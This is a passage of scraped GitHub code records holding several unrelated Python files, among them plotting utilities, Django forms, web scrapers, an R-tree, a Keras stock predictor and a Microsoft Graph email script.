\"\"\"\r\n if not title:\r\n if normalize:\r\n title = 'Normalized confusion matrix'\r\n else:\r\n title = 'Confusion matrix, without normalization'\r\n\r\n # Compute confusion matrix\r\n cm = confusion_matrix(y_true, y_pred)\r\n # Only use the labels that appear in the data\r\n classes = classes[unique_labels(y_true, y_pred)]\r\n if normalize:\r\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n print(\"Normalized confusion matrix\")\r\n else:\r\n print('Confusion matrix, without normalization')\r\n\r\n print(cm)\r\n\r\n fig, ax = plt.subplots()\r\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\r\n ax.figure.colorbar(im, ax=ax)\r\n # We want to show all ticks...\r\n ax.set(xticks=np.arange(cm.shape[1]),\r\n yticks=np.arange(cm.shape[0]),\r\n # ... and label them with the respective list entries\r\n xticklabels=classes, yticklabels=classes,\r\n title=title,\r\n ylabel='True label',\r\n xlabel='Predicted label')\r\n\r\n # Rotate the tick labels and set their alignment.\r\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\r\n rotation_mode=\"anchor\")\r\n\r\n # Loop over data dimensions and create text annotations.\r\n fmt = '.2f' if normalize else 'd'\r\n thresh = cm.max() / 2.\r\n for i in range(cm.shape[0]):\r\n for j in range(cm.shape[1]):\r\n ax.text(j, i, format(cm[i, j], fmt),\r\n ha=\"center\", va=\"center\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\")\r\n fig.tight_layout()\r\n return ax","repo_name":"cvblab/gleason_grading_cmpb","sub_path":"code/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5373,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"14101519237","text":"import json\nimport os\nimport requests\nimport random\n\nimport msal\n\nfrom resources.names import names\n\n\nclient_id = '2546f553-3885-4041-b310-2b21222bd4a4'\nclient_secret = os.environ.get('AZUREAD_CLIENT_SECRET') \ntenant_id = 'ba9d7305-30ed-42ca-8b54-65d98d0f2a29'\nauthority = f\"https://login.microsoftonline.com/{tenant_id}\"\n\napp = msal.ConfidentialClientApplication(\n client_id=client_id,\n client_credential=client_secret,\n authority=authority)\n\nscopes = [\"https://graph.microsoft.com/.default\"]\n\nresult = None\nresult = app.acquire_token_silent(scopes, account=None)\n\nif not result:\n print(\n \"No suitable token exists in cache. Let's get a new one from Azure Active Directory.\")\n result = app.acquire_token_for_client(scopes=scopes)\n\nif \"access_token\" in result:\n print(\"Access token is \" + result[\"access_token\"])\n\n\nif \"access_token\" in result:\n userId = \"mikalst@mikalst.onmicrosoft.com\"\n endpoint = f'https://graph.microsoft.com/v1.0/users/{userId}/sendMail'\n toUserEmail = \"mikal.stapnes@visma.com\"\n\n hemmelig_venn = names[random.randint(0, len(names))][\"name\"]\n budsjett = round(random.expovariate(0.005).real)\n\n email_msg = {'Message': {'Subject': f\"Hei, din hemmelige venn er {hemmelig_venn}\",\n 'Body': {'ContentType': 'Text', 'Content': f\"og budsjettet ditt er {budsjett} ,- \"},\n 'ToRecipients': [{'EmailAddress': {'Address': toUserEmail}}]\n },\n 'SaveToSentItems': 'true'}\n r = requests.post(endpoint, headers={'Authorization': f'Bearer {result[\"access_token\"]}'}, json=email_msg)\n if r.ok:\n print('Sent email successfully')\n else:\n print(r.json())\nelse:\n print(result.get(\"error\"))\n print(result.get(\"error_description\"))\n print(result.get(\"correlation_id\"))","repo_name":"mikalst/fagkveld-sendgrid","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"17989120602","text":"from django import forms\nfrom doubleboard.models import QuestionDouble, AnswerDouble, CommentDouble\n\n#QuestionDoubleForm은 QuestionDouble이라는 모델과 연결된 폼이고 속성으로 subject와 content를 사용한다고 정의\nclass QuestionDoubleForm(forms.ModelForm): #모델 폼은 모델(Model)과 연결된 폼으로 폼을 저장하면 연결된 모델의 데이터를 저장할 있음.\n class Meta: #Meta 클래스에는 사용할 모델과 모델의 속성을 적어주어야 함.\n model = QuestionDouble\n fields = ['subject_double', 'content_double']\n\n labels = {\n 'subject_double': '제목',\n 'content_double': '내용',\n }\n\nclass AnswerDoubleForm(forms.ModelForm):\n class Meta:\n model = AnswerDouble\n fields = ['content_double']\n labels = {\n 'content_double': '답변내용',\n }\n\nclass CommentDoubleForm(forms.ModelForm):\n class Meta:\n model = CommentDouble\n fields = ['content_double']\n labels = {\n 'content_double': '댓글내용',\n }","repo_name":"hs11015/django-dotcom","sub_path":"doubleboard/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26629327969","text":"import re\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nfrom joblib import Parallel, delayed\nimport openpyxl\nimport time\n\n\n\nclass bate_lista_cdb_outros():\n def __init__(self):\n self.nome = []\n\n def inicio(self, page, months):\n op = Options()\n op.add_argument('--headless')\n # op.add_argument('--window-size=640,480')\n driver = webdriver.Chrome(executable_path='./chrome/chromedriver.exe', options=op)\n url = f\"https://yubb.com.br/investimentos/renda-fixa?collection_page={page}&investment_type=renda-fixa&months={months}&principal=5000.0&sort_by=net_return\"\n driver.get(url)\n soup = bs(driver.page_source, \"html.parser\")\n #captura_dados\n dict_dados = self.extrator(soup)\n #salva_dados\n self.salva_dados(dict_dados, page)\n driver.quit()\n\n #salva os dados\n def salva_dados(self, dict_dados, pagina):\n print(pagina)\n df = pd.DataFrame(dict_dados)\n df.to_csv(f\"./dados/6 meses/{pagina}__todos_6.csv\", encoding='utf-8', mode='a')\n\n\n #extrai dados\n def extrator(self, soup):\n bloco_informacoes = soup.find('div', {'class':'investmentCardContainer__body'})\n cards = bloco_informacoes.find_all('article', {'data-spec':'investments/card'})\n list_resultado_retorno = []\n list_resultado_rentabilidade = []\n list_resultado_empresa = []\n list_resultado_tag = []\n list_resultado_tipo = []\n list_resultado_rentabilidade_ano = []\n list_resultado_prazo = []\n list_resultado_distribuidor = []\n list_resultado_emissor = []\n\n for card in cards:\n info_head = card.find('header',{'class':'stack'})\n #retorno\n try:\n resultado_retorno = info_head.find('div', {'class':'results__netReturn'})\n resultado_retorno = resultado_retorno.find('span', {'class':'sugarish__whole'}).text\n resultado_retorno = resultado_retorno.replace(',', '.')\n except:\n resultado_retorno = None\n list_resultado_retorno.append(resultado_retorno)\n #rentabilidade\n try:\n resultado_rentabilidade = info_head.find('div', {'class':'results__grossYield'})\n resultado_rentabilidade = resultado_rentabilidade.find('span',{'class':'sugarish__number'}).text\n resultado_rentabilidade = resultado_rentabilidade.replace(',', '.')\n except:\n resultado_rentabilidade = None\n list_resultado_rentabilidade.append(resultado_rentabilidade)\n #empresa\n try:\n empresa = info_head.find('h3', {'class':'flex-stack font-size--s0'})\n empresa = empresa.text\n empresa = empresa.replace(',','.')\n except:\n empresa = None\n list_resultado_empresa.append(empresa)\n #tipo\n try:\n tipo = info_head.find('h4', {'class':'badge'}).text\n except:\n tipo = None\n list_resultado_tipo.append(tipo)\n #tag\n try:\n tag_classificacao = info_head.find('span',{'class':'certification__tag'}).text\n except:\n tag_classificacao = info_head.find('span',{'class':'certification__tag'})\n list_resultado_tag.append(tag_classificacao)\n # --section\n info_section = card.find('section')\n table = info_section.find('table')\n tbody = table.find('tbody')\n #rentabilidade_ano\n try:\n rentabilidade_ano = tbody.find('th', text=re.compile('Rentabilidade líquida ao ano'))\n rentabilidade_ano = rentabilidade_ano.find_next('td').text\n rentabilidade_ano = rentabilidade_ano.replace(',', '.')\n except:\n rentabilidade_ano = None\n list_resultado_rentabilidade_ano.append(rentabilidade_ano)\n #prazo_resgate\n try:\n prazo_resgate = tbody.find('th', text=re.compile('Prazo de resgate'))\n prazo_resgate = prazo_resgate.find_next('td').text\n except:\n prazo_resgate = None\n list_resultado_prazo.append(prazo_resgate)\n #distribuidor\n try:\n distribuidor = tbody.find('th', text=re.compile('Distribuidor'))\n distribuidor = distribuidor.find_next('td').text\n except:\n distribuidor = None\n list_resultado_distribuidor.append(distribuidor)\n #emissor\n try:\n emissor = tbody.find('th', text=re.compile('Emissor'))\n emissor = emissor.find_next('td').text\n except:\n emissor = None\n list_resultado_emissor.append(emissor)\n\n dict_dados = {'retorno':list_resultado_retorno,'rentabilidade':list_resultado_rentabilidade,\n 'empresa': list_resultado_empresa, 'tag': list_resultado_tag,'tipo':list_resultado_tipo,\n 'retabilidade_ano': list_resultado_rentabilidade_ano,'prazo': list_resultado_prazo,\n 'distribuidor':list_resultado_distribuidor,'emissor':list_resultado_emissor}\n\n return dict_dados\n\nif __name__ == \"__main__\":\n start = bate_lista_cdb_outros()\n p = Parallel(n_jobs=5)(delayed(start.inicio)(page,6) for page in range(1, 21))","repo_name":"0rakul0/NPL_e_NPU","sub_path":"dados_cdb_outros.py","file_name":"dados_cdb_outros.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22124080936","text":"N, K = map(int,input().split())\narr = [int(input()) for _ in range(N)]\n\nleft = 1\nright = max(arr)\n\nwhile left<=right:\n mid = (left + right) // 2\n\n cnt = 0\n for i in arr:\n cnt += i // mid\n if cnt >= K:\n answer = mid\n left = mid + 1\n else:\n right = mid - 1\nprint(answer)\n","repo_name":"zaehuun/Python-Algorithm","sub_path":"백준/이진 탐색/[1654] 랜선 자르기.py","file_name":"[1654] 랜선 자르기.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29008417776","text":"from django.urls import path\nfrom shared.src import cybered\n\nfrom .src.hashing import HashingPageManager\nfrom .apps import HashingConfig\nfrom .views import *\n\napp_name = HashingConfig.name\nurlpatterns = cybered.get_paginated_urls(\n [\n HashingMainPageView,\n HashingMotivationPageView,\n HashingExamplesPageView,\n HashingExamplesResultPageView,\n HashingKeyedExamplesPageView,\n HashingKeyedExamplesResultPageView,\n HashingConclusionPageView,\n HashingToolsPageView,\n ],\n HashingPageManager,\n app_name,\n)\n","repo_name":"Notgnoshi/cybersec-project","sub_path":"cybered/hashing/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7522895583","text":"import itertools\nimport uuid\nimport application.helpers.constant as C\nimport application.helpers.io as io\nimport application.helpers.helper as helper\nimport application.helpers.getter as getter\nimport application.core.reusable as sky\n\n\n# node \nPARENT = 0\nMBB = 1\nCHILD = 2\nIS_LEAF = 3\n\n# skyline \nOBJ = 0 \nMINDIST = 1\nVALUE = 2\n\n\nclass RTree:\n def __init__(self, site_path, min_child=2, imported_data={}):\n # {node_id: [parent_id, bounding_box, child_id, is_leaf]}\n self.rtree = {int(k):v for k,v in imported_data.items()}\n self.root = self.rtree.pop(0, None) if imported_data else None\n self.min_children = min_child\n self.objects = []\n self.heap = []\n self.site_path = site_path\n\n\n def export(self):\n rtree_id = str(uuid.uuid4())\n rtree_path = getter.rtree_path(sitepath=self.site_path)\n rtree_filename = getter.rtree_path(sitepath=self.site_path, rtree_id=rtree_id,\n request=C.KEY_RTREE_FILE)\n \n # before exported, add rtree root id in the dict\n self.rtree[0] = self.root\n io.export_json(rtree_path, rtree_filename, self.rtree)\n return rtree_id\n \n\n def insert(self, obj):\n # format obj => {'id': '361',\n # 'label': 'customer-361', \n # 'val': [131, 256, 249]}\n if self.root:\n node_id = self.find_leaf(obj[C.VAL])\n self.update_node(node_id, child_id=obj)\n self.root = self.adjust_tree(node_id)\n else:\n bounding_box = self.calc_bounding_box(obj[C.VAL])\n node_id = self.create_node(None, bounding_box, obj, True)\n self.root = node_id\n\n\n def search(self, boundary=None, query_point=None):\n # reset\n self.objects = [] \n self.heap = []\n node_id = self.root\n\n # search\n if boundary:\n self.get_objects(node_id, boundary)\n if query_point:\n self.find_skyline(node_id, query_point)\n return self.objects\n\n\n def find_skyline(self, node_id, query_point):\n # BBS algorithm \n for child in self.rtree[node_id][CHILD]:\n obj = [child]\n if self.rtree[node_id][IS_LEAF]:\n obj += self.calc_mindist(query_point[C.VAL], min_point=child[C.VAL])\n else:\n obj += self.calc_mindist(query_point[C.VAL], bounding_box=self.rtree[child][MBB])\n self.heap.append(obj)\n self.heap = sorted(self.heap, key=lambda x: x[MINDIST])\n while self.heap:\n expanded_obj = self.heap.pop(0)\n if sky.is_dominated(query_point, expanded_obj[VALUE], self.objects):\n continue\n if not type(expanded_obj[OBJ]) is dict:\n self.find_skyline(expanded_obj[OBJ], query_point)\n else:\n self.objects.append(expanded_obj[OBJ])\n\n\n \"\"\"\n NODE \n \"\"\"\n\n\n def create_node(self, parent_id=None, bounding_box=None, child_id=None, is_leaf=False):\n node_id = max(self.rtree.keys()) + 1 if self.rtree else 1\n if child_id:\n child_id = self.as_list(child_id)\n self.rtree[node_id] = [parent_id, bounding_box, child_id, is_leaf]\n\n # update bounding box \n if child_id and not bounding_box:\n self.update_node(node_id, child_id=child_id)\n return node_id\n\n\n def update_node(self, node_id, parent_id=None, bounding_box=None, child_id=None, is_leaf=False):\n if parent_id:\n self.rtree[node_id][PARENT] = parent_id\n if bounding_box:\n self.rtree[node_id][MBB] = bounding_box\n if is_leaf:\n self.rtree[node_id][IS_LEAF] = is_leaf\n if child_id:\n if type(child_id) is list:\n self.rtree[node_id][CHILD] = child_id\n else:\n self.rtree[node_id][CHILD].append(child_id)\n\n # update is leaf and bounding box\n if self.is_object(self.rtree[node_id][CHILD][0]):\n self.rtree[node_id][IS_LEAF] = True\n MBBs = [self.calc_bounding_box(obj[C.VAL]) for obj in self.rtree[node_id][CHILD]]\n else:\n self.rtree[node_id][IS_LEAF] = False\n MBBs = [self.rtree[child_id][MBB] for child_id in self.rtree[node_id][CHILD]]\n self.rtree[node_id][MBB] = self.adjust_bounding_box(MBBs)\n\n\n \"\"\" \n Searching\n \"\"\"\n\n\n def calc_mindist(self, query_point, min_point=None, bounding_box=None):\n mindist = None\n minpoint = None\n if bounding_box:\n corners = list(itertools.product(*bounding_box)) \n if min_point:\n corners = [min_point]\n for corner in corners:\n dist = 0\n for i in range(len(corner)):\n dist += abs(query_point[i] - corner[i])\n try:\n if dist < mindist:\n mindist = dist\n minpoint = corner\n except:\n mindist = dist\n minpoint = corner\n return [mindist, minpoint]\n\n\n def expand_child(self, bounding_box, children):\n # search child with minimum boundary \n min_boundary = None\n selected_child_id = None\n for child_id in children:\n bounding_box_2 = self.get_bounding_box(child_id)\n boundary = self.calc_boundary(bounding_box, bounding_box_2)\n try:\n if boundary < min_boundary:\n min_boundary = boundary\n selected_child_id = child_id\n except TypeError:\n min_boundary = boundary\n selected_child_id = child_id\n return selected_child_id \n\n\n def find_leaf(self, obj_val, node_id=None):\n # start from root \n if not node_id:\n node_id = self.root\n\n # if the leaf is found \n if self.rtree[node_id][IS_LEAF]:\n return node_id\n\n # choose child for expansion\n bounding_box = self.calc_bounding_box(obj_val)\n child_id = self.expand_child(bounding_box, self.rtree[node_id][CHILD])\n return self.find_leaf(obj_val, child_id)\n \n\n def find_cand(self, node_id, boundary):\n # pruning the child outside the boundary\n cand = []\n for child_id in self.rtree[node_id][CHILD]:\n child_boundary = self.rtree[child_id][MBB]\n if helper.is_intersecting(child_boundary, boundary):\n cand.append(child_id)\n return cand\n\n\n def get_objects(self, node_id, boundary):\n # stop if it is leaf\n if self.rtree[node_id][IS_LEAF]:\n children = [node_id]\n else:\n children = self.find_cand(node_id, boundary)\n\n for child_id in children:\n if self.rtree[child_id][IS_LEAF]:\n for obj in self.rtree[child_id][CHILD]:\n if helper.is_inside(obj[C.VAL], boundary):\n self.objects.append(obj)\n else:\n self.get_objects(child_id, boundary)\n\n\n \"\"\" \n Adjust Tree\n \"\"\" \n\n\n def adjust_tree(self, node_id): \n # check if the number of child of node is more than min children defined\n if len(self.rtree[node_id][CHILD]) > self.min_children:\n self.split_node(node_id)\n \n # stop if it is root \n if not self.rtree[node_id][PARENT]:\n return node_id\n \n # continue to adjust the parents \n return self.adjust_tree(self.rtree[node_id][PARENT])\n\n\n def pick_seeds(self, children):\n # get two children that form the largest boundary\n max_boundary = None\n seeds = [None, None]\n for i in range(0, len(children)):\n for j in range(i + 1, len(children)):\n bounding_box_1 = self.get_bounding_box(children[i])\n bounding_box_2 = self.get_bounding_box(children[j])\n boundary = self.calc_boundary(bounding_box_1, bounding_box_2)\n try:\n if boundary > max_boundary:\n max_boundary = boundary\n seeds = [children[i], children[j]]\n except TypeError:\n max_boundary = boundary\n seeds = [children[i], children[j]]\n return seeds\n\n\n def split_node(self, node_id):\n # using quadratic-cost algorithm\n # pick seed\n seeds = self.pick_seeds(self.rtree[node_id][CHILD])\n new_set = [[seeds[0]], [seeds[1]]]\n\n # get other children besides seeds \n if self.is_object(seeds[0]):\n obj_id = list(set([obj[C.ID] for obj in self.rtree[node_id][CHILD]]) - set([obj[C.ID] for obj in seeds]))\n idx = [next((index for (index, d) in enumerate(self.rtree[node_id][CHILD]) if d[C.ID] == oid), None) for oid in obj_id]\n other_children = [self.rtree[node_id][CHILD][i] for i in idx]\n else:\n other_children = list(set(self.rtree[node_id][CHILD]) - set(seeds))\n \n # split other children \n if other_children:\n for child_id in other_children:\n bounding_box = self.get_bounding_box(child_id)\n selected_seed_id = self.expand_child(bounding_box, seeds)\n new_set[seeds.index(selected_seed_id)].append(child_id)\n\n # update the existing node\n self.update_node(node_id, child_id=new_set[0])\n\n # create new root if it is root node\n if not self.rtree[node_id][PARENT]:\n new_root_id = self.create_node(parent_id=None, child_id=node_id)\n # update the parent of existing node\n self.update_node(node_id, parent_id=new_root_id)\n\n # create new splitted node \n new_node_id = self.create_node(parent_id=self.rtree[node_id][PARENT])\n self.update_node(new_node_id, child_id=new_set[1])\n\n # update the parent to add the splitted node as new child\n self.update_node(self.rtree[node_id][PARENT], child_id=new_node_id)\n\n\n \"\"\" \n Bounding box & Boundary\n \"\"\" \n\n\n def adjust_bounding_box(self, MBBs):\n dim = len(MBBs[0])\n MBB = [[min(map(min, [mbb[_] for mbb in MBBs])), max(map(max, [mbb[_] for mbb in MBBs]))] for _ in range(dim)]\n return MBB\n\n \n def calc_bounding_box(self, obj_val):\n return [[val, val] for val in obj_val]\n\n\n def calc_boundary(self, box_1, box_2):\n boundary = 0\n dim = len(box_1)\n for i in range(dim):\n boundary += max([max(box_1[i]), max(box_2[i])]) - min([min(box_1[i]), min(box_2[i])])\n return boundary \n\n\n def get_bounding_box(self, child_id):\n if self.is_object(child_id):\n return self.calc_bounding_box(child_id[C.VAL])\n else:\n return self.rtree[child_id][MBB]\n\n\n \"\"\" \n Helper\n \"\"\" \n\n \n def as_list(self, x):\n if type(x) is list:\n return x\n else:\n return [x]\n \n def is_object(self, child):\n return type(child) is dict\n ","repo_name":"mocatfrio/kmppd","sub_path":"application/classes/rtree.py","file_name":"rtree.py","file_ext":"py","file_size_in_byte":11099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14312151618","text":"class RandomizedSet:\n\n def __init__(self):\n self.hashtable = {}\n self.number = [] \n\n def insert(self, val: int) -> bool:\n if val not in self.hashtable:\n self.hashtable[val] = len(self.number)\n self.number.append(val)\n return True\n return False\n\n def remove(self, val: int) -> bool:\n if val in self.hashtable:\n s = self.number[-1]\n self.number[-1], self.number[self.hashtable[val]] = self.number[self.hashtable[val]], self.number[-1]\n self.hashtable[s] = self.hashtable[val]\n self.hashtable.pop(val)\n self.number.pop()\n return True\n return False\n\n def getRandom(self) -> int:\n return self.number[random.randint(0, len(self.number) - 1)]\n\n# Your RandomizedSet object will be instantiated and called as such:\n# obj = RandomizedSet()\n# param_1 = obj.insert(val)\n# param_2 = obj.remove(val)\n# param_3 = obj.getRandom()","repo_name":"Yutao-Zhou/Leetcode","sub_path":"380. Insert Delete GetRandom O(1).py","file_name":"380. Insert Delete GetRandom O(1).py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72302047182","text":"import pandas_datareader as web\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.models import load_model\nimport matplotlib.pyplot as plt\n\nscaler = MinMaxScaler(feature_range=(0,1))\n\nclass Model:\n def __init__(self, x_shape):\n self.x_shape = x_shape\n self.model = load_model('./model_weights.keras')\n \n def prediction(self, x_data):\n size = len(x_data)\n x_data = x_data.reshape(-1, 1) # Ensure 2D shape for scaling\n scaled_data = scaler.fit_transform(x_data)\n scaled_data = scaled_data[size - self.x_shape:]\n scaled_data = scaled_data.reshape((1, self.x_shape, 1)) # Reshape to 3D for LSTM\n val = self.model.predict(scaled_data)\n return scaler.inverse_transform(val)[0][0]\n \n def extrapolate(self, data, length):\n current_x_data = data\n predictions = []\n for i in range(length):\n prediction = self.prediction(current_x_data)\n predictions.append(prediction)\n current_x_data = np.append(current_x_data, prediction) \n return predictions\n \nmodel = Model(60)\ndf = pd.read_csv('../stocks/AMZN.csv')\ndata = df.filter(['Close'])\ndataset = data.values\npredictions = model.extrapolate(dataset, 10)\ndata = dataset[len(dataset)-100:]\nfull_data = np.concatenate((data, np.array(predictions).reshape(-1, 1)), axis=0) # Concatenate the data and predictions\n\nprint(full_data)\n\nplt.figure(figsize=(16,8))\nplt.title('Fajita Target vs AMZN')\nplt.xlabel('Date',fontsize=18)\nplt.ylabel('Closing Price in USD($)',fontsize=18)\nplt.plot(full_data)\nplt.show()\n","repo_name":"calebrieck/Fajita","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37020606915","text":"#Checkbox Using Application \nimport tkinter as tk \nfrom tkinter import ttk \nwin = tk.Tk() \nwin.title(\"Python GUI App\") \n#Label Creation \nttk.Label(win, text=\"Checkbox status :\").grid(column=0,row=0) \n#Create three Checkbox \n#Disabled Checkbox \nchVarDis=tk.IntVar() \ncheck1=tk.Checkbutton(win, text=\"Disabled\", variable=chVarDis, state='disabled') \ncheck1.select() \ncheck1.grid(column=0,row=4, sticky=tk.W) \n#Deselected Checkbox \nchVarUn=tk.IntVar() \ncheck2=tk.Checkbutton(win, text=\"UnChecked\", variable=chVarUn) \ncheck2.deselect() \ncheck2.grid(column=1,row=4, sticky=tk.W) \n#Selected Checkbox \nchVarEn=tk.IntVar() \ncheck3=tk.Checkbutton(win, text=\"Enabled\", variable=chVarEn) \ncheck3.select() \ncheck3.grid(column=2,row=4, sticky=tk.W) \n#Calling Main() \nwin.mainloop() ","repo_name":"SushilPudke/PythonExamples","sub_path":"GUI-Checkbox/check4.py","file_name":"check4.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74832918542","text":"from os import system\nimport sys\n\nnumber_of_gridpoints = [int(10**(i)) for i in range(1,N+1)]\n\nprint(\"Compiling program...\")\nsystem(\"c++ -O3 -c project1_LU.cpp functions.cpp -larmadillo\")\nsystem(\"c++ -O3 -o project1_LU.exe project1_LU.o functions.o -larmadillo\")\n\n\nprint(\"Compilation done, executing\")\nfor n in number_of_gridpoints:\n print(\"computing for n = \" + str(n))\n system(\"./project1_LU.exe\" + \" \" + str(n))\n","repo_name":"benedibn/comphys","sub_path":"projects/project1/codes/mainLU.py","file_name":"mainLU.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26217825163","text":"from AssitentTypeEnum import AssitentTypeEnum\nfrom Assistent import Assistent\nfrom ssml_builder.core import Speech\nimport random\n\nexercicios = [\n \"Biiiiiiiiiiiiixaaaaaaaaaaaaaaaaaaa não\",\n ]\n\nspeech = Speech()\n\nfor item in exercicios:\n speech.add_text(item)\n speech.pause(time=\"1s\")\n\n\n\ntype_asistente = AssitentTypeEnum.AWS\n\nassist = Assistent.factory(type_asistente)\nmp3 = assist.synthesize_speech(speech.speak())\n\nwith open(\"out/{}.mp3\".format(type_asistente.name), 'wb') as out:\n out.write(mp3)\n","repo_name":"adsmaicon/AssistenteGinasticaLaboral","sub_path":"AssitenteGinastica.py","file_name":"AssitenteGinastica.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"16483772393","text":"import pandas as pd\nfrom sklearn import model_selection\nimport os\nimport sys\nimport pickle\nfrom collections import defaultdict\n\n\"\"\"\npicks features for training a model \nparams: list of levels, list of features, title.\n\"\"\"\n\n\nclass Picker:\n def __init__(self):\n with open(os.path.join(sys.path[0], \"ref.txt\"), \"r\") as x:\n for i in x:\n comp_name = i\n x.close()\n self.locker = self.load_pickle(f\"../configs/configs-{comp_name}/locker.pkl\")\n # ----------------------------------------------------------\n self.list_levels = []\n self.list_features = []\n self.list_feat_title = []\n self.feat_dict = self.load_pickle(\n f\"../configs/configs-{self.locker['comp_name']}/features_dict.pkl\"\n )\n\n def show_variables(self):\n print()\n for i, (k, v) in enumerate(self.__dict__.items()):\n print(f\"{i}. {k} :=======>\", v)\n print()\n\n def save_pickle(self, path, to_dump):\n with open(path, \"wb\") as f:\n pickle.dump(to_dump, f)\n\n def load_pickle(self, path):\n with open(path, \"rb\") as f:\n o = pickle.load(f)\n return o\n\n def find_keys(\n self, list_levels=\"--|--\", list_features=\"--|--\", list_feat_title=\"--|--\"\n ):\n # -----------------------------dump feature dictionary\n if list_levels != \"--|--\":\n self.list_levels = list_levels\n if list_features != \"--|--\":\n self.list_features = list_features\n if list_feat_title != \"--|--\":\n self.list_feat_title = list_feat_title\n all_keys = list(self.feat_dict.keys())\n\n valid_keys1 = list(self.feat_dict.keys())\n valid_keys2 = list(self.feat_dict.keys())\n valid_keys3 = list(self.feat_dict.keys())\n if self.list_levels != []:\n valid_keys1 = []\n for key in list(self.feat_dict.keys()):\n t = str(key).split(\"_\")[1]\n if t in str(self.list_levels):\n valid_keys1.append(key)\n if self.list_features != []:\n valid_keys2 = []\n for key in list(self.feat_dict.keys()):\n t = str(key).split(\"_\")[3]\n if t in str(self.list_features):\n valid_keys2.append(key)\n if self.list_feat_title != []:\n valid_keys3 = []\n for key, val in list(self.feat_dict.items()):\n if str(val[2]) in str(self.list_feat_title):\n valid_keys3.append(key)\n valid_keys = set(valid_keys1).intersection(set(valid_keys2))\n valid_keys = list(valid_keys.intersection(set(valid_keys3)))\n return valid_keys\n\n def find_features(\n self, list_levels=\"--|--\", list_features=\"--|--\", list_feat_title=\"--|--\"\n ):\n # -----------------------------dump feature dictionary\n if list_levels != \"--|--\":\n self.list_levels = list_levels\n if list_features != \"--|--\":\n self.list_features = list_features\n if list_feat_title != \"--|--\":\n self.list_feat_title = list_feat_title\n valid_keys = self.find_keys(\n self.list_levels, self.list_features, self.list_feat_title\n )\n valid_features = []\n for key in valid_keys:\n valid_features += self.feat_dict[key][0]\n return valid_features\n\n def help(self):\n # display all the feature engineering done so far\n # Key:- f\"l{self.level_no}_f{feat_no}\"\n # value:- [created, from , info]\n for key, value in self.feat_dict.items():\n print(key, f\"{value[-1]} :-\")\n print(\"features created:\")\n print(value[0])\n print(\"from:\")\n print(value[1])\n print(\"=\" * 40)\n\n\nif __name__ == \"__main__\":\n p = Picker()\n # p.list_levels = [\"1\"]\n # p.list_features = [\"1\", \"2\", \"0\"]\n p.list_feat_title = [\"unique_characters\"]\n print(p.find_keys())\n print()\n print(p.find_features())\n","repo_name":"ar8372/Framework3","sub_path":"src-framework3/feature_picker.py","file_name":"feature_picker.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21999762652","text":"from selenium import webdriver # Loads Selenium WebDriver\n# from selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By # Loads .BY\nimport time\n\nURL = f\"https://www.simplyrecipes.com/trinidadian-macaroni-pie-recipe-6830792\" # Macro holding scraping target URL\nRECIPE_TITLE = \"recipe-block__header_1-0\" # ElementID for name of dish on SimplyRecipes (SR) recipe page\nRECIPE_INFO = \"recipe-block__meta_1-0\" # ElementID for prep time, cook time, combined time, and servings on SR recipe page\nINGREDIENTS = \"section--ingredients_1-0\" # ElementID for ingredient list on SR recipe page\nMETHOD = \"section--instructions_1-0\" # ElementID for cooking instructions on SR recipe page\nPATH = \"/usr/local/bin/chromedriver\" # Filepath for Selenium Chromedriver\nSPACER = f\"\\n\\n ------------------------------- \\n\" # Visual spacer for terminal output\nEND = f\"\\n\\n --------------END--------------\" # Visual spacer for terminal output, notates end of program output\n\ndriver = webdriver.Chrome(PATH) # assigns Chromedriver\n\ndriver.get(URL) # Passes URL to Chromedriver\nrecipe_title = driver.find_element(By.ID, RECIPE_TITLE) # Retrieves name of dish from SR recipe page\nrecipe_info = driver.find_element(By.ID, RECIPE_INFO) # Retrieves prep time, cook time, combined time, and servings from SR recipe page\ningredients = driver.find_element(By.ID, INGREDIENTS) # Retrieves ingredient list from SR recipe page\nmethod = driver.find_element(By.ID, METHOD) # Retrieves cooking instructions from SR recipe page\nprint(recipe_title.text + SPACER) # Prints retrieved name of dish\nprint(recipe_info.text + SPACER) # Prints retrieved prep time, cook time, combined time, and 